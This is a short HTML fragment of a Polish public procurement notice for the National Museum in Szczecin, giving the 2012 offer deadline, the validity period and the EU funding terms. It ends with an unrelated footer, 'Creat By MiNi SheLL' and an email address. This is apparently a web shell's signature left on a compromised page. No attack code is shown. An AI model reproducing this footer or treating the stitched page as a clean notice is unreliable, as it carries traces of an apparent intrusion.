<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 10:00, miejsce: Muzeum Narodowe w Szczecinie, ul. Staromłyńska 27, 70-561 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com